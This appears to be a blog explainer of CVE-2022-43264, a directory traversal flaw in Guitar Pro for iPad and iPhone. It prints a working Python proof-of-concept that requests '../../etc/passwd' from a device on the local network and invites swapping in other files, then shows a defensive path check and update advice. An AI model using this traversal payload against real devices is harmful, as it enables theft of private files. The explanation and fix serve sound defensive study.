If you play music and use tablature, you probably know Guitar Pro—a popular app for editing, playing, and sharing tabs. But did you know that earlier versions had a serious security hole? This post explains CVE-2022-43264, a directory traversal vulnerability in Arobas Music Guitar Pro for iPad and iPhone (before v1.10.2), which allowed attackers to download almost any file from your device with a crafty web request. In this article, we’ll break down what happened, how it works, and how attackers could exploit it, all in simple terms.
What is CVE-2022-43264?
CVE-2022-43264 is a vulnerability discovered in the Guitar Pro app for iPad and iPhone, versions before 1.10.2. The problem: the app didn't properly validate the input it got over the network. This allowed attackers to use directory traversal—jumping up directories by inputting sequences like ../..—to grab files they aren’t supposed to access.
Why is This Bad?
Normally, your iPhone or iPad keeps app data isolated. If Guitar Pro exposes a little web server—say, to make sharing easier—it’s supposed to let people access only their own files (for example, their tablature). But with this bug, someone on the same WiFi could ask for any file the app can see, by manipulating the URL. That could include your saved tabs, recordings, or, in some cases, sensitive configuration or keychain files.
Here's the basic process:
1. Attacker connects to the same WiFi or local network as an iOS device running a vulnerable version of Guitar Pro.
2. Guitar Pro’s local file sharing feature starts a mini web server (usually at http://<ip>:808 or similar).
3. Attacker crafts an HTTP request to fetch ../../../../... (repeated as needed) to traverse out of the music folder into system directories.
4. If the server doesn't sanitize this path, it serves any file requested, as long as iOS permissions allow.
Code Snippet: Example Exploit in Python
Here’s a simple Python script that demonstrates this vulnerability. It tries to download /etc/passwd for illustration (on Unix/iOS, replace with a real filename):
```python
import requests

# Change this to the victim's device IP and port
target = 'http://192.168.1.5:808'

# Try to fetch a sensitive file by traversing directories
traversal = '../../../../../../../../etc/passwd'
url = f"{target}/files/{traversal}"

response = requests.get(url)
if response.status_code == 200:
    print("File contents:")
    print(response.text)
else:
    print(f"Could not read file. Status: {response.status_code}")
```
*Note: On actual iOS devices, system files are usually not accessible, but you can replace /etc/passwd with whatever user file you want to grab from the app's sandboxed storage.*
How Was This Fixed?
Arobas Music patched this in Guitar Pro version 1.10.2. The fix tightens input validation, blocking path traversal sequences and only allowing access to intended folders.
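One way to implement the kind of check described above, as an added example (this is not Arobas Music's code): decode the request, resolve the final path, and serve it only if it still sits inside the shared folder. The folder layout, file names and function names are constructed for illustration, and the unchecked join is shown beside the hardened one.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional
from urllib.parse import unquote


def naive_resolve(root: Path, requested: str) -> Path:
    """Vulnerable pattern: joins the request path onto the share root unchecked."""
    return Path(os.path.normpath(root / unquote(requested)))


def safe_resolve(root: Path, requested: str) -> Optional[Path]:
    """Return the real path of a file inside root, or None if the request escapes it."""
    decoded = unquote(requested)  # decode first so %2e%2e%2f is seen as ../
    if "\x00" in decoded:
        return None
    root_real = root.resolve()
    # lstrip("/") keeps an absolute request path from replacing the root in the join.
    candidate = (root_real / decoded.lstrip("/")).resolve()
    # resolve() collapses ".." and follows symlinks, so compare the final location.
    if not candidate.is_relative_to(root_real):
        return None
    return candidate if candidate.is_file() else None


def demo() -> dict:
    """Build a constructed share folder and run sample requests through both resolvers."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp).resolve()
        share = base / "Documents" / "tabs"  # hypothetical shared folder
        share.mkdir(parents=True)
        (share / "song.gp").write_text("tab data")
        (base / "Documents" / "settings.plist").write_text("private")
        samples = ["song.gp", "../settings.plist", "%2e%2e%2fsettings.plist", "/etc/passwd"]
        results = {}
        for req in samples:
            safe = safe_resolve(share, req)
            # (did the naive join stay inside the share?, file the safe resolver serves)
            results[req] = (naive_resolve(share, req).is_relative_to(share),
                            None if safe is None else safe.name)
        return results


if __name__ == "__main__":
    for req, (naive_inside, served) in demo().items():
        print(f"{req!r}: naive stays in share={naive_inside}, safe serves={served}")
```

The containment test runs on the resolved path rather than on the raw string, so percent-encoded sequences and symlinks pointing outside the folder are rejected by the same check.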
References
- NVD Entry for CVE-2022-43264
- Guitar Pro for iOS (iPad & iPhone) App Store
- OWASP Directory Traversal Cheat Sheet
Disable file sharing in Guitar Pro when you don’t need it, especially on public WiFi.
- Stay cautious about installing or running old versions of apps when security updates are available.
In Conclusion
This vulnerability is a classic example of why all developers, including music app creators, need to validate user input before using it in file operations. If you use Guitar Pro, update now to stay safe—and never trust everything on your WiFi!
Timeline
Published on: 11/16/2022 15:15:00 UTC
Last modified on: 11/18/2022 04:43:00 UTC